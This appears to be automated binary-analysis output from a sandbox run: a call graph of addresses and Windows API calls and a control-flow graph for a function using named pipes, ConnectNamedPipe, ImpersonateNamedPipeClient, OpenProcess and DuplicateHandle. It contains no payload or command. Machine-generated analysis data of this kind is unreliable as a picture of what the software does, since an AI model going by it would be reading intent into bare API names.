22238 a095c5 WriteFile 22236->22238 22239 a09576 22236->22239 22237 a09522 22240 a09529 22237->22240 22241 a0954c 22237->22241 22242 a095e7 GetLastError 22238->22242 22253 a0955d 22238->22253 22244 a095b3 22239->22244 22245 a0957e 22239->22245 22240->22250 22273 a08f59 6 API calls 22240->22273 22274 a08b87 58 API calls 3 library calls 22241->22274 22242->22253 22264 a0903f 22244->22264 22248 a095a1 22245->22248 22249 a09583 22245->22249 22276 a09203 8 API calls 2 library calls 22248->22276 22249->22250 22251 a0958c 22249->22251 22250->22222 22275 a0911a 7 API calls _ValidateLocalCookies 22251->22275 22253->22250 22255->22225 22256->22225 22277 a1da17 22257->22277 22259 a08fd3 22260 a09034 22259->22260 22261 a09001 22259->22261 22286 a03690 54 API calls 2 library calls 22259->22286 22260->22236 22260->22237 22261->22260 22263 a0901b GetConsoleMode 22261->22263 22263->22260 22269 a0904e 22264->22269 22265 a090ff 22290 9e15fd 22265->22290 22267 a09118 22267->22250 22268 a090be WriteFile 22268->22269 22270 a09101 GetLastError 22268->22270 22269->22265 22269->22268 22270->22265 22271->22250 22272->22232 22273->22250 22274->22253 22275->22250 22276->22253 22278 a1da24 22277->22278 22280 a1da31 22277->22280 22287 a0424a 14 API calls __floor_pentium4 22278->22287 22282 a1da3d 22280->22282 22288 a0424a 14 API calls __floor_pentium4 22280->22288 22281 a1da29 22281->22259 22282->22259 22284 a1da5e 22289 9fb78f 45 API calls std::locale::_Setgloballocale 22284->22289 22286->22261 22287->22281 22288->22284 22289->22281 22291 9e1606 IsProcessorFeaturePresent 22290->22291 22292 9e1605 22290->22292 22294 9e1648 22291->22294 22292->22267 22297 9e160b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22294->22297 22296 9e172b 22296->22267 22297->22296 22298->22205 22299->22207 22300->22211 22301->22212 23130 756fe0 54 API calls 23139 7716a0 119 API calls 4 library calls 22702 9e2c04 22704 9e2b5e 22702->22704 22703 9e2bcc 22704->22703 22707 9e2bc6 22704->22707 22709 9fc8d0 79 API calls std::locale::_Setgloballocale 22704->22709 22707->22703 22708 9fbb8a 46 API calls std::locale::_Setgloballocale 22707->22708 22708->22703 22709->22707 23131 8b0d10 TerminateProcess EnterCriticalSection LeaveCriticalSection 23140 8bbc50 106 API calls std::_Facet_Register 23046 a141bd 23049 a14024 23046->23049 23050 a14051 23049->23050 23051 a14063 23049->23051 23076 9e1b8b GetModuleHandleW 23050->23076 23061 a13eec 23051->23061 23055 a14056 23055->23051 23077 a1410e GetModuleHandleExW 23055->23077 23056 a140a0 23060 a140b5 23062 a13ef8 std::locale::_Setgloballocale 23061->23062 23083 a1738d EnterCriticalSection 23062->23083 23064 a13f02 23084 a13f39 23064->23084 23066 a13f0f 23088 a13f2d 23066->23088 23069 a140bb 23110 a140ec 23069->23110 23072 a140d9 23074 a1410e std::locale::_Setgloballocale 3 API calls 23072->23074 23073 a140c9 GetCurrentProcess TerminateProcess 23073->23072 23075 a140e1 ExitProcess 23074->23075 23076->23055 23078 a1414d GetProcAddress 23077->23078 23079 a1416e 23077->23079 23078->23079 23080 a14161 23078->23080 23081 a14174 FreeLibrary 23079->23081 23082 a14062 23079->23082 23080->23079 23081->23082 23082->23051 23083->23064 23085 a13f45 std::locale::_Setgloballocale 23084->23085 23087 a13fac std::locale::_Setgloballocale 23085->23087 23091 a14fc7 23085->23091 23087->23066 23109 a173d5 LeaveCriticalSection 23088->23109 23090 a13f1b 23090->23056 23090->23069 23092 a14fd3 __EH_prolog3 23091->23092 23095 a14d1f 23092->23095 23094 a14ffa std::locale::_Init 23094->23087 23096 a14d2b std::locale::_Setgloballocale 23095->23096 23103 a1738d EnterCriticalSection 23096->23103 23098 a14d39 23104 a14ed7 23098->23104 23102 a14d57 23102->23094 23103->23098 23105 a14d46 23104->23105 23106 a14ef6 23104->23106 23108 a14d6e LeaveCriticalSection std::_Lockit::~_Lockit 23105->23108 23106->23105 23107 a199dc ___free_lconv_mon 14 API calls 23106->23107 23107->23105 23108->23102 23109->23090 23115 a1ccf5 6 API calls std::locale::_Setgloballocale 23110->23115 23112 a140f1 23113 a140f6 GetPEB 23112->23113 23114 a140c5 23112->23114 23113->23114 23114->23072 23114->23073 23115->23112 23141 9fb140 5 API calls _ValidateLocalCookies 22302 727d90 22305 727da6 std::locale::_Locimp::_Locimp 22302->22305 22306 727dce 22302->22306 22303 727e77 22376 7275a0 46 API calls SimpleUString::operator= 22303->22376 22306->22303 22315 727770 22306->22315 22309 727e17 std::locale::_Locimp::_Locimp 22311 727e72 22309->22311 22312 727e59 22309->22312 22313 727e62 22309->22313 22371 9fb79f 22311->22371 22368 8bb340 22312->22368 22316 7277a0 22315->22316 22317 72777d 22315->22317 22318 7277b1 22316->22318 22321 8bb2b0 std::_Facet_Register 106 API calls 22316->22321 22319 7277b7 22317->22319 22320 727784 22317->22320 22318->22309 22389 7273b0 RaiseException Concurrency::cancel_current_task 22319->22389 22377 8bb2b0 22320->22377 22324 7277aa 22321->22324 22324->22309 22325 72778a 22326 727793 22325->22326 22327 9fb79f std::ios_base::failure::failure 45 API calls 22325->22327 22326->22309 22328 7277c1 22327->22328 22329 72782b 22328->22329 22331 7277f1 22328->22331 22332 727814 22328->22332 22390 7273b0 RaiseException Concurrency::cancel_current_task 22329->22390 22331->22329 22335 7277f8 22331->22335 22333 727825 22332->22333 22336 8bb2b0 std::_Facet_Register 106 API calls 22332->22336 22333->22309 22334 7277fe 22337 9fb79f std::ios_base::failure::failure 45 API calls 22334->22337 22341 727807 22334->22341 22338 8bb2b0 std::_Facet_Register 106 API calls 22335->22338 22339 72781e 22336->22339 22340 727835 22337->22340 22338->22334 22339->22309 22342 727891 22340->22342 22344 727857 22340->22344 22345 72787a 22340->22345 22341->22309 22391 7273b0 RaiseException Concurrency::cancel_current_task 22342->22391 22344->22342 22348 72785e 22344->22348 22346 72788b 22345->22346 22349 8bb2b0 std::_Facet_Register 106 API calls 22345->22349 22346->22309 22347 727864 22350 9fb79f std::ios_base::failure::failure 45 API calls 22347->22350 22354 72786d 22347->22354 22351 8bb2b0 std::_Facet_Register 106 API calls 22348->22351 22352 727884 22349->22352 22353 72789b 22350->22353 22351->22347 22352->22309 22355 7278ea 22353->22355 22356 7278b6 22353->22356 22357 7278d9 22353->22357 22354->22309 22355->22309 22392 7273b0 RaiseException Concurrency::cancel_current_task 22355->22392 22356->22355 22360 7278bd 22356->22360 22357->22355 22359 7278dd 22357->22359 22362 8bb2b0 std::_Facet_Register 106 API calls 22359->22362 22363 8bb2b0 std::_Facet_Register 106 API calls 22360->22363 22361 7278c3 22364 9fb79f std::ios_base::failure::failure 45 API calls 22361->22364 22367 7278cc 22361->22367 22365 7278e3 22362->22365 22363->22361 22366 7278fa 22364->22366 22365->22309 22367->22309 22439 8bb5b0 22368->22439 22458 9fb6db 45 API calls std::locale::_Setgloballocale 22371->22458 22373 9fb7ae 22459 9fb7bc 11 API calls std::locale::_Setgloballocale 22373->22459 22375 9fb7bb 22393 8bb460 22377->22393 22379 8bb2be Concurrency::cancel_current_task 22380 8bb2c5 22379->22380 22404 9f7461 RaiseException 22379->22404 22380->22325 22382 8bb2df 22383 8bb31a 22382->22383 22384 8bb300 22382->22384 22386 8bb460 std::_Facet_Register 106 API calls 22383->22386 22405 8bb500 106 API calls 2 library calls 22384->22405 22388 8bb322 22386->22388 22387 8bb309 22387->22325 22388->22325 22394 8bb46f 22393->22394 22395 8bb4ee 22393->22395 22406 8cdf40 22394->22406 22395->22379 22397 8bb47f ___tlregdtor std::_Facet_Register 22397->22395 22409 a139a6 22397->22409 22399 8bb4a7 22417 8ce010 106 API calls std::_Facet_Register 22399->22417 22401 8bb4b3 std::_Facet_Register 22418 8bbae0 106 API calls std::_Facet_Register 22401->22418 22403 8bb4e3 22403->22379 22404->22382 22405->22387 22419 8bb760 22406->22419 22410 a139b1 22409->22410 22411 a139d1 HeapSize 22410->22411 22412 a139bc 22410->22412 22411->22399 22437 a0424a 14 API calls __floor_pentium4 22412->22437 22414 a139c1 22438 9fb78f 45 API calls std::locale::_Setgloballocale 22414->22438 22416 a139cc 22416->22399 22417->22401 22418->22403 22422 8bb770 22419->22422 22421 8bb765 22421->22397 22423 8bb77d 22422->22423 22433 8bb816 std::_Facet_Register 22422->22433 22424 8bb828 22423->22424 22426 8bb797 22423->22426 22435 a053c6 45 API calls 3 library calls 22424->22435 22434 8ccf40 106 API calls std::_Facet_Register 22426->22434 22427 8bb82d 22436 8bcdb0 106 API calls std::_Facet_Register 22427->22436 22430 8bb7da 22432 8bb770 std::_Facet_Register 106 API calls 22430->22432 22431 8bb841 22431->22421 22432->22433 22433->22421 22434->22430 22435->22427 22436->22431 22437->22414 22438->22416 22440 8bb5c2 22439->22440 22446 8bb360 22439->22446 22441 a139a6 std::ios_base::_Ios_base_dtor 46 API calls 22440->22441 22442 8bb5ca std::ios_base::_Ios_base_dtor 22441->22442 22447 9fb468 22442->22447 22446->22313 22451 a199dc 22447->22451 22450 8ce060 106 API calls 2 library calls 22450->22446 22452 8bb637 22451->22452 22453 a199e7 RtlFreeHeap 22451->22453 22452->22450 22453->22452 22454 a199fc GetLastError 22453->22454 22455 a19a09 ___free_lconv_mon 22454->22455 22457 a0424a 14 API calls __floor_pentium4 22455->22457 22457->22452 22458->22373 22459->22375 23120 a3ebc0 HeapDestroy 22521 a05504 22522 a05510 std::locale::_Setgloballocale 22521->22522 22523 a05524 22522->22523 22524 a05517 GetLastError ExitThread 22522->22524 22535 a19d54 GetLastError 22523->22535 22529 a05540 22567 a056e3 22529->22567 22536 a19d70 22535->22536 22537 a19d6a 22535->22537 22541 a19d74 SetLastError 22536->22541 22572 a1a8e0 6 API calls std::_Lockit::_Lockit 22536->22572 22571 a1a8a1 6 API calls std::_Lockit::_Lockit 22537->22571 22540 a19d8c 22540->22541 22573 a1a29b 22540->22573 22545 a05529 22541->22545 22546 a19e09 22541->22546 22562 a1ccb1 22545->22562 22584 a053c6 45 API calls 3 library calls 22546->22584 22547 a19da9 22580 a1a8e0 6 API calls std::_Lockit::_Lockit 22547->22580 22548 a19dba 22581 a1a8e0 6 API calls std::_Lockit::_Lockit 22548->22581 22552 a19e0e 22553 a19dc6 22554 a19de1 22553->22554 22555 a19dca 22553->22555 22583 a19b82 14 API calls __Getctype 22554->22583 22582 a1a8e0 6 API calls std::_Lockit::_Lockit 22555->22582 22558 a199dc ___free_lconv_mon 14 API calls 22558->22541 22559 a19dec 22561 a199dc ___free_lconv_mon 14 API calls 22559->22561 22560 a19db7 22560->22558 22561->22541 22563 a1ccc3 GetPEB 22562->22563 22566 a05534 22562->22566 22564 a1ccd6 22563->22564 22563->22566 22587 a1a713 22564->22587 22566->22529 22570 a1ab89 5 API calls std::_Lockit::_Lockit 22566->22570 22605 a055b9 22567->22605 22569 a056f0 22570->22529 22571->22536 22572->22540 22578 a1a2a8 __Getctype 22573->22578 22574 a1a2e8 22586 a0424a 14 API calls __floor_pentium4 22574->22586 22575 a1a2d3 RtlAllocateHeap 22576 a19da1 22575->22576 22575->22578 22576->22547 22576->22548 22578->22574 22578->22575 22585 a20a25 EnterCriticalSection LeaveCriticalSection __Getctype 22578->22585 22580->22560 22581->22553 22582->22560 22583->22559 22584->22552 22585->22578 22586->22576 22590 a1a650 22587->22590 22591 a1a67e 22590->22591 22594 a1a67a 22590->22594 22591->22594 22597 a1a585 22591->22597 22594->22566 22595 a1a698 GetProcAddress 22595->22594 22596 a1a6a8 std::locale::_Setgloballocale 22595->22596 22596->22594 22603 a1a596 std::_Lockit::_Lockit 22597->22603 22598 a1a62c 22598->22594 22598->22595 22599 a1a5b4 LoadLibraryExW 22600 a1a633 22599->22600 22601 a1a5cf GetLastError 22599->22601 22600->22598 22602 a1a645 FreeLibrary 22600->22602 22601->22603 22602->22598 22603->22598 22603->22599 22604 a1a602 LoadLibraryExW 22603->22604 22604->22600 22604->22603 22614 a19ea5 GetLastError 22605->22614 22607 a05606 ExitThread 22608 a055c4 22608->22607 22609 a055dd 22608->22609 22637 a1abc4 5 API calls std::_Lockit::_Lockit 22608->22637 22611 a055f0 22609->22611 22612 a055e9 CloseHandle 22609->22612 22611->22607 22613 a055fc FreeLibraryAndExitThread 22611->22613 22612->22611 22613->22607 22615 a19ec1 22614->22615 22616 a19ebb 22614->22616 22620 a19ec5 SetLastError 22615->22620 22639 a1a8e0 6 API calls std::_Lockit::_Lockit 22615->22639 22638 a1a8a1 6 API calls std::_Lockit::_Lockit 22616->22638 22619 a19edd 22619->22620 22621 a1a29b __Getctype 12 API calls 22619->22621 22620->22608 22623 a19ef2 22621->22623 22624 a19f0b 22623->22624 22625 a19efa 22623->22625 22641 a1a8e0 6 API calls std::_Lockit::_Lockit 22624->22641 22640 a1a8e0 6 API calls std::_Lockit::_Lockit 22625->22640 22628 a19f08 22633 a199dc ___free_lconv_mon 12 API calls 22628->22633 22629 a19f17 22630 a19f32 22629->22630 22631 a19f1b 22629->22631 22643 a19b82 14 API calls __Getctype 22630->22643 22642 a1a8e0 6 API calls std::_Lockit::_Lockit 22631->22642 22633->22620 22635 a19f3d 22636 a199dc ___free_lconv_mon 12 API calls 22635->22636 22636->22620 22637->22609 22638->22615 22639->22619 22640->22628 22641->22629 22642->22628 22643->22635 23122 8818e0 80 API calls std::_Facet_Register 22720 8bc620 22721 8bc64c 22720->22721 22731 8bc705 22720->22731 22722 8bc672 GetCurrentThreadId 22721->22722 22723 8bc67b std::locale::_Setgloballocale 22721->22723 22725 8bc77b std::_Facet_Register 22722->22725 22726 8bc697 GetCurrentThreadId 22723->22726 22728 a03e90 std::_Facet_Register 55 API calls 22725->22728 22732 8bd060 22726->22732 22728->22731 22729 8bc6cc std::_Facet_Register 22752 a03e90 22729->22752 22733 8bd087 22732->22733 22758 8beb00 106 API calls 3 library calls 22733->22758 22735 8bd092 22759 795000 55 API calls std::_Facet_Register 22735->22759 22737 8bd0c4 22738 8bd0f6 22737->22738 22739 8bd0ef 22737->22739 22740 8bd100 22737->22740 22738->22729 22741 8bb340 std::ios_base::_Ios_base_dtor 106 API calls 22739->22741 22742 9fb79f std::ios_base::failure::failure 45 API calls 22740->22742 22741->22738 22743 8bd105 22742->22743 22744 8bd060 std::_Facet_Register 106 API calls 22743->22744 22745 8bd138 std::_Facet_Register 22744->22745 22746 8bd1ba 22745->22746 22747 8bd155 22745->22747 22761 795000 55 API calls std::_Facet_Register 22746->22761 22760 795000 55 API calls std::_Facet_Register 22747->22760 22750 8bd1b1 22750->22729 22751 8bd1d1 22751->22729 22753 a03ea4 std::locale::_Setgloballocale 22752->22753 22762 9fd6f3 22753->22762 22756 9fb4cb std::locale::_Setgloballocale 45 API calls 22757 a03ecc 22756->22757 22757->22731 22758->22735 22759->22737 22760->22750 22761->22751 22763 9fd71f 22762->22763 22764 9fd742 22762->22764 22773 9fb712 45 API calls 2 library calls 22763->22773 22764->22763 22767 9fd74a std::_Facet_Register 22764->22767 22766 9e15fd _ValidateLocalCookies 5 API calls 22768 9fd865 22766->22768 22774 a00d9b 55 API calls 2 library calls 22767->22774 22768->22756 22771 9fd737 22771->22766 22772 9fd7cb 22775 a00033 14 API calls ___free_lconv_mon 22772->22775 22773->22771 22774->22772 22775->22771 23132 9e2535 9 API calls 3 library calls 23143 8b0d60 150 API calls 23133 9f8b30 10 API calls 3 library calls 23124 a28bd0 176 API calls 4 library calls 22460 7399c0 RegQueryValueExW 22461 739a2d 22460->22461 22462 739a08 22460->22462 22462->22461 22462->22462 22495 727e80 22462->22495 22498 727ec7 22495->22498 22496 727f7b 22519 7275a0 46 API calls SimpleUString::operator= 22496->22519 22498->22496 22504 7278a0 22498->22504 22505 7278ea 22504->22505 22506 7278ad 22504->22506 22505->22496 22520 7273b0 RaiseException Concurrency::cancel_current_task 22505->22520 22507 7278b6 22506->22507 22508 7278d9 22506->22508 22507->22505 22511 7278bd 22507->22511 22508->22505 22510 7278dd 22508->22510 22512 8bb2b0 std::_Facet_Register 106 API calls 22510->22512 22513 8bb2b0 std::_Facet_Register 106 API calls 22511->22513 22515 7278e3 22512->22515 22516 7278c3 22513->22516 22514 9fb79f std::ios_base::failure::failure 45 API calls 22517 7278fa 22514->22517 22515->22496 22516->22514 22518 7278cc 22516->22518 22518->22496 23125 73a500 108 API calls 3 library calls 23144 73d680 145 API calls 4 library calls 23126 74f000 45 API calls ___std_exception_copy 22644 77bec0 22647 8bf040 22644->22647 22646 77bed1 22648 8bf0eb 22647->22648 22649 8bf050 22647->22649 22662 8be800 22648->22662 22649->22648 22650 8bf068 22649->22650 22651 8bf0a8 22649->22651 22652 8bf057 22649->22652 22650->22648 22656 8bf071 22650->22656 22654 8bf0bd timeGetTime 22651->22654 22661 8bf086 22651->22661 22687 8be7c0 QueryPerformanceCounter QueryPerformanceCounter 22652->22687 22654->22646 22656->22661 22688 8bf150 QueryPerformanceCounter QueryPerformanceCounter 22656->22688 22657 8bf0f4 22657->22646 22658 8bf060 22658->22646 22660 8bf09e 22660->22646 22661->22646 22663 8be826 22662->22663 22664 8be859 22663->22664 22665 8be8a2 22663->22665 22670 8be837 22663->22670 22674 8be868 22664->22674 22694 8bf150 QueryPerformanceCounter QueryPerformanceCounter 22664->22694 22666 8be8be 22665->22666 22689 9e068c EnterCriticalSection 22665->22689 22669 8be8d9 22666->22669 22695 8bf150 QueryPerformanceCounter QueryPerformanceCounter 22666->22695 22669->22657 22670->22657 22671 8be912 22671->22666 22675 8be91e timeGetDevCaps 22671->22675 22672 8be88c 22672->22657 22674->22657 22676 8be950 GetSystemTime SystemTimeToFileTime timeGetTime timeBeginPeriod timeSetEvent 22675->22676 22677 8be935 22675->22677 22679 8bea0f 22676->22679 22680 8be9f4 22676->22680 22696 71b180 45 API calls ___std_exception_copy 22677->22696 22700 9e0642 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 22679->22700 22698 71b180 45 API calls ___std_exception_copy 22680->22698 22682 8be942 22697 9f7461 RaiseException 22682->22697 22685 8bea01 22699 9f7461 RaiseException 22685->22699 22687->22658 22688->22660 22693 9e06a0 22689->22693 22690 9e06a5 LeaveCriticalSection 22690->22671 22693->22690 22701 9e0714 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 22693->22701 22694->22672 22695->22669 22696->22682 22697->22676 22698->22685 22699->22679 22700->22666 22701->22693 22710 8bc5f0 22713 8bc490 22710->22713 22712 8bc60c 22714 8bc4a0 22713->22714 22719 8bc504 22713->22719 22715 8bc4b6 GetCurrentThreadId 22714->22715 22716 8bc50b std::locale::_Setgloballocale 22714->22716 22715->22719 22718 8bc52c GetCurrentThreadId 22716->22718 22718->22719 22719->22712 22776 8b0e30 22777 8b0e50 ConnectNamedPipe 22776->22777 22778 8b0e5f GetLastError 22777->22778 22781 8b0eb4 22777->22781 22780 8b0e68 GetLastError 22778->22780 22778->22781 22910 a27fa0 114 API calls 22780->22910 22783 8b0ecc 22781->22783 22784 8b0ec1 DisconnectNamedPipe 22781->22784 22795 8b14a0 22781->22795 22786 8b0ee3 22783->22786 22787 8b0ed3 22783->22787 22784->22777 22785 8b0e92 22911 740900 22785->22911 22923 a281c0 22785->22923 22790 8bb340 std::ios_base::_Ios_base_dtor 106 API calls 22786->22790 22948 8a9340 148 API calls 22787->22948 22793 8b0eeb 22790->22793 22792 8b0ed9 22792->22786 22949 8ad600 22795->22949 22798 8b1957 22801 9e15fd _ValidateLocalCookies 5 API calls 22798->22801 22799 8b14e8 22804 8b14f1 22799->22804 22810 8b157b 22799->22810 22800 8b1613 22802 8b1619 22800->22802 22803 8b1682 22800->22803 22805 8b1969 22801->22805 22958 a27e80 114 API calls 22802->22958 22811 9e068c std::_Facet_Register 5 API calls 22803->22811 22812 8b16a2 22803->22812 22807 8b1548 22804->22807 22808 8b14f6 22804->22808 22805->22781 22954 8ada30 148 API calls 22807->22954 22952 a27e80 114 API calls 22808->22952 22809 8b15be 22956 a27e80 114 API calls 22809->22956 22810->22809 22818 8b158b 22810->22818 22820 8b1977 22811->22820 22813 8b1735 22812->22813 22822 8b1738 OpenProcess 22812->22822 22849 8b16cb 22812->22849 22813->22822 22814 8b163a 22821 740900 106 API calls 22814->22821 22955 8ada30 148 API calls 22818->22955 22820->22812 22828 8b1987 22820->22828 22829 8b1640 22821->22829 22830 8b1847 22822->22830 22831 8b1755 ImpersonateNamedPipeClient 22822->22831 22823 8b15df 22832 740900 106 API calls 22823->22832 22824 8b1565 22833 9e15fd _ValidateLocalCookies 5 API calls 22824->22833 22825 8b1517 22826 740900 106 API calls 22825->22826 22834 8b151d 22826->22834 22827 8b15a8 22835 9e15fd _ValidateLocalCookies 5 API calls 22827->22835 22975 8a9d50 LoadLibraryW GetProcAddress 22828->22975 22959 743e40 106 API calls 3 library calls 22829->22959 22967 a28d30 EnterCriticalSection 22830->22967 22839 8b1762 GetLastError 22831->22839 22840 8b17b0 OpenProcess RevertToSelf 22831->22840 22841 8b15e5 22832->22841 22842 8b1577 22833->22842 22953 7bc6f0 110 API calls 3 library calls 22834->22953 22846 8b15ba 22835->22846 22964 a27fa0 114 API calls 22839->22964 22843 8b17cb GetLastError 22840->22843 22844 8b1806 22840->22844 22957 88a3a0 106 API calls 2 library calls 22841->22957 22842->22781 22965 a27fa0 114 API calls 22843->22965 22866 8b1822 22844->22866 22873 a281c0 138 API calls 22844->22873 22846->22781 22847 8b1859 22855 8bb2b0 std::_Facet_Register 106 API calls 22847->22855 22848 8b1998 22976 9e0642 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 22848->22976 22961 a27e80 114 API calls 22849->22961 22850 8b1652 22858 740900 106 API calls 22850->22858 22854 8b152a 22876 9e15fd _ValidateLocalCookies 5 API calls 22854->22876 22862 8b1860 22855->22862 22865 8b1658 22858->22865 22859 8b1789 22867 740900 106 API calls 22859->22867 22860 8b15f5 22881 9e15fd _ValidateLocalCookies 5 API calls 22860->22881 22861 8b17f7 22868 740900 106 API calls 22861->22868 22869 8b18e6 22862->22869 22870 8b186e CreateEventW CreateEventW CreateEventW 22862->22870 22863 8b19a7 22863->22812 22864 8b16ec 22871 740900 106 API calls 22864->22871 22960 743e40 106 API calls 3 library calls 22865->22960 22866->22830 22966 a27e80 114 API calls 22866->22966 22874 8b178f 22867->22874 22875 8b17fd 22868->22875 22969 8b0660 106 API calls std::_Facet_Register 22869->22969 22968 8b0720 152 API calls 22870->22968 22878 8b16f2 22871->22878 22873->22866 22880 a281c0 138 API calls 22874->22880 22883 740900 106 API calls 22875->22883 22884 8b1544 22876->22884 22962 894ef0 106 API calls 3 library calls 22878->22962 22879 8b1664 22894 9e15fd _ValidateLocalCookies 5 API calls 22879->22894 22887 8b179d 22880->22887 22888 8b160f 22881->22888 22883->22844 22884->22781 22891 9e15fd _ValidateLocalCookies 5 API calls 22887->22891 22888->22781 22889 8b1704 22892 740900 106 API calls 22889->22892 22890 8b1903 22970 a28d40 LeaveCriticalSection 22890->22970 22895 8b17ac 22891->22895 22896 8b170a 22892->22896 22898 8b167e 22894->22898 22895->22781 22963 894ef0 106 API calls 3 library calls 22896->22963 22897 8b190a 22971 8b0a00 GetCurrentProcess DuplicateHandle 22897->22971 22898->22781 22901 8b1918 22972 8b0a00 GetCurrentProcess DuplicateHandle 22901->22972 22902 8b1717 22903 9e15fd _ValidateLocalCookies 5 API calls 22902->22903 22905 8b1731 22903->22905 22905->22781 22906 8b192c 22973 8b0a00 GetCurrentProcess DuplicateHandle 22906->22973 22908 8b1940 22974 8ada30 148 API calls 22908->22974 22910->22785 22912 740931 22911->22912 22992 738a80 22912->22992 22914 740b16 22914->22785 22915 740afe 22915->22914 22996 739f50 106 API calls 3 library calls 22915->22996 22916 740b42 std::_Facet_Register 22997 71b060 106 API calls std::ios_base::failure::failure 22916->22997 22920 740b74 22998 9f7461 RaiseException 22920->22998 22922 740b82 22922->22785 22924 740900 106 API calls 22923->22924 22925 a281e3 FormatMessageW 22924->22925 22926 a28214 22925->22926 22927 a2829e GetLastError 22925->22927 22928 a28236 22926->22928 22930 a2832c 22926->22930 23005 a28ac0 109 API calls 22927->23005 23000 a28cd0 22928->23000 23007 9e172d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 22930->23007 22934 a28331 22937 9fb79f std::ios_base::failure::failure 45 API calls 22934->22937 22935 a282db 22935->22934 22939 a2830a 22935->22939 22943 a28311 22935->22943 22938 a28336 22937->22938 22941 8bb340 std::ios_base::_Ios_base_dtor 106 API calls 22939->22941 22941->22943 22942 a2828e 23004 71b9e0 106 API calls 2 library calls 22942->23004 22944 9e15fd _ValidateLocalCookies 5 API calls 22943->22944 22946 8b0ea9 DisconnectNamedPipe 22944->22946 22946->22777 22947 a2829c 23006 795ac0 106 API calls 3 library calls 22947->23006 22948->22792 22977 8adb50 22949->22977 22951 8ad623 22951->22798 22951->22799 22951->22800 22952->22825 22953->22854 22954->22824 22955->22827 22956->22823 22957->22860 22958->22814 22959->22850 22960->22879 22961->22864 22962->22889 22963->22902 22964->22859 22965->22861 22966->22830 22967->22847 22968->22869 22969->22890 22970->22897 22971->22901 22972->22906 22973->22908 22974->22798 22975->22848 22976->22863 22978 8adb75 22977->22978 22979 8adbe3 22978->22979 22989 a27e80 114 API calls 22978->22989 22979->22951 22981 8adbbc 22982 740900 106 API calls 22981->22982 22983 8adbc2 22982->22983 22990 7bc6f0 110 API calls 3 library calls 22983->22990 22985 8adbd2 22986 740900 106 API calls 22985->22986 22987 8adbd8 22986->22987 22991 7bc6f0 110 API calls 3 library calls 22987->22991 22989->22981 22990->22985 22991->22979 22994 738ab9 22992->22994 22993 738af0 22993->22915 22993->22916 22994->22993 22999 73bb80 106 API calls 3 library calls 22994->22999 22996->22914 22997->22920 22998->22922 22999->22993 23008 a28af0 23000->23008 23003 a28ac0 109 API calls 23003->22942 23004->22947 23005->22947 23006->22935 23007->22934 23013 a29550 23008->23013 23010 a28271 23010->23003 23011 a28b07 23011->23010 23012 a298f0 106 API calls 23011->23012 23012->23011 23015 a2955e 23013->23015 23014 a29591 23014->23011 23015->23014 23016 a29580 23015->23016 23017 a29588 23015->23017 23021 72d5a0 23016->23021 23019 72d5a0 132 API calls 23017->23019 23019->23014 23020 a29586 23020->23011 23022 72d6dc 23021->23022 23023 72d5bb 23021->23023 23022->23020 23023->23022 23026 72d5cd 23023->23026 23027 72d69d std::locale::_Locimp::_Locimp 23023->23027 23024 72d6f4 23045 7275a0 46 API calls SimpleUString::operator= 23024->23045 23026->23024 23028 727770 std::ios_base::failure::failure 106 API calls 23026->23028 23027->23022 23029 72d6d3 23027->23029 23032 72d6ef 23027->23032 23036 72d620 std::locale::_Locimp::_Locimp 23028->23036 23033 8bb340 std::ios_base::_Ios_base_dtor 106 API calls 23029->23033 23030 72d6f9 23035 726740 79 API calls 23030->23035 23044 72d76d 23030->23044 23031 72d67f std::locale::_Locimp::_Locimp 23031->23020 23034 9fb79f std::ios_base::failure::failure 45 API calls 23032->23034 23033->23022 23034->23024 23037 72d73d 23035->23037 23036->23031 23036->23032 23038 72d65f 23036->23038 23040 72d75a 23037->23040 23042 9fc896 79 API calls 23037->23042 23037->23044 23039 8bb340 std::ios_base::_Ios_base_dtor 106 API calls 23038->23039 23041 72d668 23039->23041 23043 9fc076 52 API calls 23040->23043 23040->23044 23041->23020 23042->23040 23043->23044 23044->23020

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 8b14a0-8b14cc call 8ad600 2 8b14d1-8b14d6 0->2 3 8b195a-8b196c call 9e15fd 2->3 4 8b14dc-8b14e2 2->4 5 8b14e8-8b14eb 4->5 6 8b1613-8b1617 4->6 10 8b157b-8b1581 5->10 11 8b14f1-8b14f4 5->11 8 8b1619-8b1681 call a27e80 call 740900 call 743e40 call 740900 call 743e40 call a27ff0 call 9e15fd 6->8 9 8b1682-8b169c 6->9 13 8b196d-8b1981 call 9e068c 9->13 14 8b16a2-8b16a9 9->14 18 8b15be-8b1612 call a27e80 call 740900 call 88a3a0 call a27ff0 call 9e15fd 10->18 19 8b1583-8b1589 10->19 16 8b1548-8b157a call 8ada30 call 9e15fd 11->16 17 8b14f6-8b1547 call a27e80 call 740900 call 7bc6f0 call a27ff0 call 9e15fd 11->17 13->14 37 8b1987-8b19aa call 8a9d50 call 9e0642 13->37 21 8b16af-8b16c1 14->21 22 8b1735 14->22 19->18 27 8b158b-8b15bd call 8ada30 call 9e15fd 19->27 21->22 48 8b16c3-8b16c9 21->48 31 8b1738-8b174f OpenProcess 22->31 40 8b184c-8b1868 call a28d30 call 8bb2b0 31->40 41 8b1755-8b1760 ImpersonateNamedPipeClient 31->41 37->14 85 8b18ee 40->85 86 8b186e-8b18ec CreateEventW * 3 call 8b0720 40->86 50 8b1762-8b17af GetLastError call a27fa0 call 740900 call a281c0 call 9e15fd 41->50 51 8b17b0-8b17c9 OpenProcess RevertToSelf 41->51 48->31 60 8b16cb-8b1734 call a27e80 call 740900 call 894ef0 call 740900 call 894ef0 call a27ff0 call 9e15fd 48->60 54 8b17cb-8b180e GetLastError call a27fa0 call 740900 * 2 51->54 55 8b1810 51->55 70 8b1813-8b1815 54->70 55->70 79 8b1822-8b1824 70->79 80 8b1817-8b181d call a281c0 70->80 79->40 92 8b1826-8b1847 call a27e80 79->92 80->79 97 8b18f0-8b1957 call 8b0660 call a28d40 call 8b0a00 call 80f980 call 8b0a00 call 80f980 call 8b0a00 call 80f980 call 8ada30 85->97 86->97 92->40 97->3
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
